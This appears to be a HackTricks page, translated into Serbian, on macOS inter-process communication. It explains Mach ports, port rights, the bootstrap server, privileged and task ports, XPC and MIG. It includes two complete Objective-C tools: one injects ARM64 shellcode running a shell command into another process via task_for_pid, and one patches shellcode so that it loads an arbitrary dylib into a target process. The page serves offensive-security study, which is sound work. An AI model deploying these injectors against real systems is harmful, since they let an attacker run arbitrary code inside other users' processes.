# macOS IPC - Inter Process Communication {{#include ../../../../banners/hacktricks-training.md}} ## Mach messaging via Ports ### Basic Information Mach koristi **zadace** kao **najmanju jedinicu** za deljenje resursa, a svaka zadaca može sadržati **više niti**. Ove **zadace i niti su mapirane 1:1 na POSIX procese i niti**. Komunikacija između zadataka se odvija putem Mach Inter-Process Communication (IPC), koristeći jednosmerne komunikacione kanale. **Poruke se prenose između portova**, koji deluju kao **redovi poruka** kojima upravlja kernel. Svaki proces ima **IPC tabelu**, u kojoj je moguće pronaći **mach portove procesa**. Ime mach porta je zapravo broj (pokazivač na kernel objekat). Proces takođe može poslati ime porta sa nekim pravima **drugoj zadaci** i kernel će učiniti da se ovaj unos u **IPC tabeli druge zadace** pojavi. ### Port Rights Prava portova, koja definišu koje operacije zadaca može izvesti, ključna su za ovu komunikaciju. Moguća **prava portova** su ([definicije ovde](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): - **Pravo primanja**, koje omogućava primanje poruka poslatih na port. Mach portovi su MPSC (više proizvođača, jedan potrošač) redovi, što znači da može postojati samo **jedno pravo primanja za svaki port** u celom sistemu (za razliku od cevi, gde više procesa može držati deskriptore datoteka za kraj čitanja jedne cevi). - **Zadaca sa pravom primanja** može primati poruke i **kreirati prava slanja**, omogućavajući joj da šalje poruke. Prvobitno samo **vlastita zadaca ima pravo primanja nad svojim portom**. - **Pravo slanja**, koje omogućava slanje poruka na port. - Pravo slanja može biti **klonirano** tako da zadaca koja poseduje pravo slanja može klonirati to pravo i **dodeliti ga trećoj zadaci**. - **Pravo slanja jednom**, koje omogućava slanje jedne poruke na port i zatim nestaje. - **Pravo skupa portova**, koje označava _skup portova_ umesto jednog port. Uklanjanje poruke iz skupa portova uklanja poruku iz jednog od portova koje sadrži. Skupovi portova mogu se koristiti za slušanje na nekoliko portova istovremeno, slično kao `select`/`poll`/`epoll`/`kqueue` u Unixu. - **Mrtvo ime**, koje nije stvarno pravo porta, već samo mesto za rezervaciju. Kada se port uništi, sva postojeća prava porta na port postaju mrtva imena. **Zadace mogu prenositi PRAVA SLANJA drugima**, omogućavajući im da šalju poruke nazad. **PRAVA SLANJA se takođe mogu klonirati, tako da zadaca može duplicirati i dati pravo trećoj zadaci**. Ovo, u kombinaciji sa posredničkim procesom poznatim kao **bootstrap server**, omogućava efikasnu komunikaciju između zadataka. ### File Ports File portovi omogućavaju enkapsulaciju deskriptora datoteka u Mac portovima (koristeći prava Mach portova). Moguće je kreirati `fileport` iz datog FD koristeći `fileport_makeport` i kreirati FD iz fileporta koristeći `fileport_makefd`. ### Establishing a communication #### Steps: Kao što je pomenuto, da bi se uspostavio komunikacioni kanal, uključuje se **bootstrap server** (**launchd** u mac). 1. Zadaca **A** inicira **novi port**, dobijajući **PRAVO PRIMANJA** u procesu. 2. Zadaca **A**, kao nosilac prava primanja, **generiše PRAVO SLANJA za port**. 3. Zadaca **A** uspostavlja **vezu** sa **bootstrap serverom**, pružajući **ime usluge porta** i **PRAVO SLANJA** kroz proceduru poznatu kao bootstrap registracija. 4. Zadaca **B** komunicira sa **bootstrap serverom** da izvrši bootstrap **pretragu za imenom usluge**. Ako je uspešna, **server duplicira PRAVO SLANJA** primljeno od Zadace A i **prenosi ga Zadaci B**. 5. Nakon sticanja PRAVA SLANJA, Zadaca **B** je sposobna da **formuliše** **poruku** i pošalje je **Zadaci A**. 6. Za dvosmernu komunikaciju obično zadaca **B** generiše novi port sa **PRAVOM PRIMANJA** i **PRAVOM SLANJA**, i daje **PRAVO SLANJA Zadaci A** kako bi mogla slati poruke Zadaci B (dvosmerna komunikacija). Bootstrap server **ne može autentifikovati** ime usluge koje tvrdi da poseduje zadaca. To znači da bi **zadaca** potencijalno mogla **imitirati bilo koju sistemsku zadacu**, kao što je lažno **tvrđenje o imenu usluge za autorizaciju** i zatim odobravanje svake zahteve. Zatim, Apple čuva **imena usluga koje obezbeđuje sistem** u sigurnim konfiguracionim datotekama, smeštenim u **SIP-zaštićenim** direktorijumima: `/System/Library/LaunchDaemons` i `/System/Library/LaunchAgents`. Pored svakog imena usluge, **pripadajući binarni fajl se takođe čuva**. Bootstrap server će kreirati i zadržati **PRAVO PRIMANJA za svako od ovih imena usluga**. Za ove unapred definisane usluge, **proces pretrage se malo razlikuje**. Kada se ime usluge pretražuje, launchd dinamički pokreće uslugu. Novi radni tok je sledeći: - Zadaca **B** inicira bootstrap **pretragu** za imenom usluge. - **launchd** proverava da li zadaca radi i ako ne, **pokreće** je. - Zadaca **A** (usluga) vrši **bootstrap prijavu**. Ovde, **bootstrap** server kreira PRAVO SLANJA, zadržava ga i **prenosi PRAVO PRIMANJA Zadaci A**. - launchd duplicira **PRAVO SLANJA i šalje ga Zadaci B**. - Zadaca **B** generiše novi port sa **PRAVOM PRIMANJA** i **PRAVOM SLANJA**, i daje **PRAVO SLANJA Zadaci A** (usluga) kako bi mogla slati poruke Zadaci B (dvosmerna komunikacija). Međutim, ovaj proces se primenjuje samo na unapred definisane sistemske zadace. Ne-sistemske zadace i dalje funkcionišu kao što je prvobitno opisano, što potencijalno može omogućiti imitaciju. ### A Mach Message [Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) Funkcija `mach_msg`, koja je u suštini sistemski poziv, koristi se za slanje i primanje Mach poruka. Funkcija zahteva da poruka koja se šalje bude prvi argument. Ova poruka mora početi sa strukturom `mach_msg_header_t`, nakon koje sledi stvarni sadržaj poruke. Struktura je definisana na sledeći način: ```c typedef struct { mach_msg_bits_t msgh_bits; mach_msg_size_t msgh_size; mach_port_t msgh_remote_port; mach_port_t msgh_local_port; mach_port_name_t msgh_voucher_port; mach_msg_id_t msgh_id; } mach_msg_header_t; ``` Procesi koji poseduju _**pravo primanja**_ mogu primati poruke na Mach portu. Nasuprot tome, **pošiljaocima** se dodeljuje _**pravo slanja**_ ili _**pravo slanja jednom**_. Pravo slanja jednom je isključivo za slanje jedne poruke, nakon čega postaje nevažeće. Da bi se postigla laka **dvosmerna komunikacija**, proces može odrediti **mach port** u mach **zaglavlju poruke** nazvanom _port za odgovor_ (**`msgh_local_port`**) gde **primalac** poruke može **poslati odgovor** na ovu poruku. Bit zastavice u **`msgh_bits`** mogu se koristiti da **naznače** da bi **pravo slanja jednom** trebalo da se izvede i prenese za ovaj port (`MACH_MSG_TYPE_MAKE_SEND_ONCE`). > [!TIP] > Imajte na umu da se ova vrsta dvosmerne komunikacije koristi u XPC porukama koje očekuju odgovor (`xpc_connection_send_message_with_reply` i `xpc_connection_send_message_with_reply_sync`). Ali **obično se kreiraju različiti portovi** kao što je objašnjeno ranije da bi se stvorila dvosmerna komunikacija. Ostala polja zaglavlja poruke su: - `msgh_size`: veličina celog paketa. - `msgh_remote_port`: port na kojem je ova poruka poslata. - `msgh_voucher_port`: [mach vaučeri](https://robert.sesek.com/2023/6/mach_vouchers.html). - `msgh_id`: ID ove poruke, koji tumači primalac. > [!CAUTION] > Imajte na umu da se **mach poruke šalju preko \_mach porta**\_, koji je **kanal za komunikaciju sa jednim primaocem** i **više pošiljalaca** ugrađen u mach kernel. **Više procesa** može **slati poruke** na mach port, ali u bilo kojem trenutku samo **jedan proces može čitati** iz njega. ### Nabrojati portove ```bash lsmp -p ``` Možete instalirati ovaj alat na iOS preuzimanjem sa [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) ### Primer koda Obratite pažnju kako **pošiljalac** **dodeljuje** port, kreira **pravo slanja** za ime `org.darlinghq.example` i šalje ga **bootstrap serveru** dok je pošiljalac tražio **pravo slanja** tog imena i koristio ga za **slanje poruke**. {{#tabs}} {{#tab name="receiver.c"}} ```c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html // gcc receiver.c -o receiver #include #include #include int main() { // Create a new port. mach_port_t port; kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); if (kr != KERN_SUCCESS) { printf("mach_port_allocate() failed with code 0x%x\n", kr); return 1; } printf("mach_port_allocate() created port right name %d\n", port); // Give us a send right to this port, in addition to the receive right. kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); if (kr != KERN_SUCCESS) { printf("mach_port_insert_right() failed with code 0x%x\n", kr); return 1; } printf("mach_port_insert_right() inserted a send right\n"); // Send the send right to the bootstrap server, so that it can be looked up by other processes. kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); if (kr != KERN_SUCCESS) { printf("bootstrap_register() failed with code 0x%x\n", kr); return 1; } printf("bootstrap_register()'ed our port\n"); // Wait for a message. struct { mach_msg_header_t header; char some_text[10]; int some_number; mach_msg_trailer_t trailer; } message; kr = mach_msg( &message.header, // Same as (mach_msg_header_t *) &message. MACH_RCV_MSG, // Options. We're receiving a message. 0, // Size of the message being sent, if sending. sizeof(message), // Size of the buffer for receiving. port, // The port to receive a message on. MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL // Port for the kernel to send notifications about this message to. ); if (kr != KERN_SUCCESS) { printf("mach_msg() failed with code 0x%x\n", kr); return 1; } printf("Got a message\n"); message.some_text[9] = 0; printf("Text: %s, number: %d\n", message.some_text, message.some_number); } ``` {{#endtab}} {{#tab name="sender.c"}} ```c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html // gcc sender.c -o sender #include #include #include int main() { // Lookup the receiver port using the bootstrap server. mach_port_t port; kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); if (kr != KERN_SUCCESS) { printf("bootstrap_look_up() failed with code 0x%x\n", kr); return 1; } printf("bootstrap_look_up() returned port right name %d\n", port); // Construct our message. struct { mach_msg_header_t header; char some_text[10]; int some_number; } message; message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); message.header.msgh_remote_port = port; message.header.msgh_local_port = MACH_PORT_NULL; strncpy(message.some_text, "Hello", sizeof(message.some_text)); message.some_number = 35; // Send the message. kr = mach_msg( &message.header, // Same as (mach_msg_header_t *) &message. MACH_SEND_MSG, // Options. We're sending a message. sizeof(message), // Size of the message being sent. 0, // Size of the buffer for receiving. MACH_PORT_NULL, // A port to receive a message on, if receiving. MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL // Port for the kernel to send notifications about this message to. ); if (kr != KERN_SUCCESS) { printf("mach_msg() failed with code 0x%x\n", kr); return 1; } printf("Sent a message\n"); } ``` {{#endtab}} {{#endtabs}} ### Privilegovani portovi - **Host port**: Ako proces ima **Send** privilegiju preko ovog porta, može dobiti **informacije** o **sistemu** (npr. `host_processor_info`). - **Host priv port**: Proces sa **Send** pravom preko ovog porta može izvoditi **privilegovane akcije** kao što je učitavanje kernel ekstenzije. **Proces mora biti root** da bi dobio ovu dozvolu. - Pored toga, da bi se pozvala **`kext_request`** API, potrebno je imati druge privilegije **`com.apple.private.kext*`** koje se daju samo Apple binarnim datotekama. - **Task name port:** Nepprivilegovana verzija _task porta_. Referencira zadatak, ali ne omogućava njegovo kontrolisanje. Jedina stvar koja se čini dostupnom kroz njega je `task_info()`. - **Task port** (poznat i kao kernel port)**:** Sa Send dozvolom preko ovog porta moguće je kontrolisati zadatak (čitati/pisati memoriju, kreirati niti...). - Pozovite `mach_task_self()` da **dobijete ime** za ovaj port za pozivajući zadatak. Ovaj port se samo **nasleđuje** kroz **`exec()`**; novi zadatak kreiran sa `fork()` dobija novi task port (kao poseban slučaj, zadatak takođe dobija novi task port nakon `exec()` u suid binarnoj datoteci). Jedini način da se pokrene zadatak i dobije njegov port je da se izvede ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) dok se radi `fork()`. - Ovo su ograničenja za pristup portu (iz `macos_task_policy` iz binarne datoteke `AppleMobileFileIntegrity`): - Ako aplikacija ima **`com.apple.security.get-task-allow` privilegiju**, procesi iz **iste korisničke grupe mogu pristupiti task portu** (obično dodato od strane Xcode za debagovanje). Proces **notarizacije** to neće dozvoliti za produkcijske verzije. - Aplikacije sa **`com.apple.system-task-ports`** privilegijom mogu dobiti **task port za bilo koji** proces, osim kernela. U starijim verzijama to se zvalo **`task_for_pid-allow`**. Ovo se dodeljuje samo Apple aplikacijama. - **Root može pristupiti task portovima** aplikacija **koje nisu** kompajlirane sa **hardened** runtime-om (i nisu od Apple-a). ### Shellcode injekcija u niti putem Task porta Možete preuzeti shellcode sa: {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} {{#tabs}} {{#tab name="mysleep.m"}} ```objectivec // clang -framework Foundation mysleep.m -o mysleep // codesign --entitlements entitlements.plist -s - mysleep #import double performMathOperations() { double result = 0; for (int i = 0; i < 10000; i++) { result += sqrt(i) * tan(i) - cos(i); } return result; } int main(int argc, const char * argv[]) { @autoreleasepool { NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] processIdentifier]); while (true) { [NSThread sleepForTimeInterval:5]; performMathOperations(); // Silent action [NSThread sleepForTimeInterval:5]; } } return 0; } ``` {{#endtab}} {{#tab name="entitlements.plist"}} ```xml com.apple.security.get-task-allow ``` {{#endtab}} {{#endtabs}} **Kompajlirati** prethodni program i dodati **entitlements** da bi mogli da injektujete kod sa istim korisnikom (ako ne, moraćete da koristite **sudo**).
sc_injector.m ```objectivec // gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector #import #import #include #include #ifdef __arm64__ kern_return_t mach_vm_allocate ( vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags ); kern_return_t mach_vm_write ( vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt ); #else #include #endif #define STACK_SIZE 65536 #define CODE_SIZE 128 // ARM64 shellcode that executes touch /tmp/lalala char injectedCode[] = "\xff\x03\x01\xd1\xe1\x03\x00\x91\x60\x01\x00\x10\x20\x00\x00\xf9\x60\x01\x00\x10\x20\x04\x00\xf9\x40\x01\x00\x10\x20\x08\x00\xf9\x3f\x0c\x00\xf9\x80\x00\x00\x10\xe2\x03\x1f\xaa\x70\x07\x80\xd2\x01\x00\x00\xd4\x2f\x62\x69\x6e\x2f\x73\x68\x00\x2d\x63\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x6c\x61\x6c\x61\x6c\x61\x00"; int inject(pid_t pid){ task_t remoteTask; // Get access to the task port of the process we want to inject into kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); if (kr != KERN_SUCCESS) { fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); return (-1); } else{ printf("Gathered privileges over the task port of process: %d\n", pid); } // Allocate memory for the stack mach_vm_address_t remoteStack64 = (vm_address_t) NULL; mach_vm_address_t remoteCode64 = (vm_address_t) NULL; kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); return (-2); } else { fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); } // Allocate memory for the code remoteCode64 = (vm_address_t) NULL; kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); return (-2); } // Write the shellcode to the allocated memory kr = mach_vm_write(remoteTask, // Task port remoteCode64, // Virtual Address (Destination) (vm_address_t) injectedCode, // Source 0xa9); // Length of the source if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); return (-3); } // Set the permissions on the allocated code memory kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); return (-4); } // Set the permissions on the allocated stack memory kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); return (-4); } // Create thread to run shellcode struct arm_unified_thread_state remoteThreadState64; thread_act_t remoteThread; memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); remoteStack64 += (STACK_SIZE / 2); // this is the real stack //remoteStack64 -= 8; // need alignment of 16 const char* p = (const char*) remoteCode64; remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); return (-3); } return (0); } pid_t pidForProcessName(NSString *processName) { NSArray *arguments = @[@"pgrep", processName]; NSTask *task = [[NSTask alloc] init]; [task setLaunchPath:@"/usr/bin/env"]; [task setArguments:arguments]; NSPipe *pipe = [NSPipe pipe]; [task setStandardOutput:pipe]; NSFileHandle *file = [pipe fileHandleForReading]; [task launch]; NSData *data = [file readDataToEndOfFile]; NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; return (pid_t)[string integerValue]; } BOOL isStringNumeric(NSString *str) { NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; return r.location == NSNotFound; } int main(int argc, const char * argv[]) { @autoreleasepool { if (argc < 2) { NSLog(@"Usage: %s ", argv[0]); return 1; } NSString *arg = [NSString stringWithUTF8String:argv[1]]; pid_t pid; if (isStringNumeric(arg)) { pid = [arg intValue]; } else { pid = pidForProcessName(arg); if (pid == 0) { NSLog(@"Error: Process named '%@' not found.", arg); return 1; } else{ printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); } } inject(pid); } return 0; } ```
```bash gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject ./inject ``` ### Dylib Injection in thread via Task port U macOS **nitne** mogu biti manipulirane putem **Mach** ili korišćenjem **posix `pthread` api**. Nit koju smo generisali u prethodnoj injekciji, generisana je koristeći Mach api, tako da **nije posix kompatibilna**. Bilo je moguće **injektovati jednostavan shellcode** za izvršavanje komande jer **nije bilo potrebno raditi sa posix** kompatibilnim apijima, samo sa Mach. **Složenije injekcije** bi zahtevale da **nit** takođe bude **posix kompatibilna**. Stoga, da bi se **poboljšala nit**, trebalo bi pozvati **`pthread_create_from_mach_thread`** koja će **kreirati validan pthread**. Tada bi ovaj novi pthread mogao **pozvati dlopen** da **učita dylib** iz sistema, tako da umesto pisanja novog shellcode-a za izvođenje različitih akcija, moguće je učitati prilagođene biblioteke. Možete pronaći **primer dylibs** u (na primer, onaj koji generiše log i zatim možete slušati): {{#ref}} ../../macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}}
dylib_injector.m ```objectivec // gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector // Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __arm64__ //#include "mach/arm/thread_status.h" // Apple says: mach/mach_vm.h:1:2: error: mach_vm.h unsupported // And I say, bullshit. kern_return_t mach_vm_allocate ( vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags ); kern_return_t mach_vm_write ( vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt ); #else #include #endif #define STACK_SIZE 65536 #define CODE_SIZE 128 char injectedCode[] = // "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) // Call pthread_set_self "\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables "\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack "\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer "\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the "\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; "\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start "\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; "\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) "\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread "\x00\x00\x00\x14" // loop: b loop ; loop forever // Call dlopen with the path to the library "\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; "\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; "\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop "\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() // Call pthread_exit "\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT "\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; "\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit "PTHRDCRT" // <- "PTHRDEXT" // <- "DLOPEN__" // <- "LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; int inject(pid_t pid, const char *lib) { task_t remoteTask; struct stat buf; // Check if the library exists int rc = stat (lib, &buf); if (rc != 0) { fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); //return (-9); } // Get access to the task port of the process we want to inject into kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); if (kr != KERN_SUCCESS) { fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); return (-1); } else{ printf("Gathered privileges over the task port of process: %d\n", pid); } // Allocate memory for the stack mach_vm_address_t remoteStack64 = (vm_address_t) NULL; mach_vm_address_t remoteCode64 = (vm_address_t) NULL; kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); return (-2); } else { fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); } // Allocate memory for the code remoteCode64 = (vm_address_t) NULL; kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); return (-2); } // Patch shellcode int i = 0; char *possiblePatchLocation = (injectedCode ); for (i = 0 ; i < 0x100; i++) { // Patching is crude, but works. // extern void *_pthread_set_self; possiblePatchLocation++; uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; uint64_t addrOfDlopen = (uint64_t) dlopen; if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) { memcpy(possiblePatchLocation, &addrOfPthreadExit,8); printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); } if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) { memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); } if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) { printf ("DLOpen @%llx\n", addrOfDlopen); memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); } if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) { strcpy(possiblePatchLocation, lib ); } } // Write the shellcode to the allocated memory kr = mach_vm_write(remoteTask, // Task port remoteCode64, // Virtual Address (Destination) (vm_address_t) injectedCode, // Source 0xa9); // Length of the source if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); return (-3); } // Set the permissions on the allocated code memory kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); return (-4); } // Set the permissions on the allocated stack memory kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); return (-4); } // Create thread to run shellcode struct arm_unified_thread_state remoteThreadState64; thread_act_t remoteThread; memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); remoteStack64 += (STACK_SIZE / 2); // this is the real stack //remoteStack64 -= 8; // need alignment of 16 const char* p = (const char*) remoteCode64; remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); return (-3); } return (0); } int main(int argc, const char * argv[]) { if (argc < 3) { fprintf (stderr, "Usage: %s _pid_ _action_\n", argv[0]); fprintf (stderr, " _action_: path to a dylib on disk\n"); exit(0); } pid_t pid = atoi(argv[1]); const char *action = argv[2]; struct stat buf; int rc = stat (action, &buf); if (rc == 0) inject(pid,action); else { fprintf(stderr,"Dylib not found\n"); } } ```
```bash gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector ./inject ``` ### Preuzimanje niti putem Task port U ovoj tehnici se preuzima nit procesa: {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md {{#endref}} ## XPC ### Osnovne informacije XPC, što je skraćenica za XNU (jezgro koje koristi macOS) međuprocesna komunikacija, je okvir za **komunikaciju između procesa** na macOS-u i iOS-u. XPC pruža mehanizam za **sigurne, asinhrone pozive metoda između različitih procesa** na sistemu. To je deo Apple-ove sigurnosne paradigme, koja omogućava **kreiranje aplikacija sa odvojenim privilegijama** gde svaki **komponent** radi sa **samo onim dozvolama koje su mu potrebne** da obavi svoj posao, čime se ograničava potencijalna šteta od kompromitovanog procesa. Za više informacija o tome kako ova **komunikacija funkcioniše** i kako bi mogla biti **ranjiva** proverite: {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/ {{#endref}} ## MIG - Mach Interface Generator MIG je kreiran da **pojednostavi proces kreiranja Mach IPC** koda. U suštini, **generiše potrebni kod** za server i klijenta da komuniciraju sa datom definicijom. Čak i ako je generisani kod ružan, programer će samo morati da ga uveze i njegov kod će biti mnogo jednostavniji nego pre. Za više informacija proverite: {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md {{#endref}} ## Reference - [https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html) - [https://knight.sc/malware/2019/03/15/code-injection-on-macos.html](https://knight.sc/malware/2019/03/15/code-injection-on-macos.html) - [https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a](https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a) - [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) - [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) {{#include ../../../../banners/hacktricks-training.md}}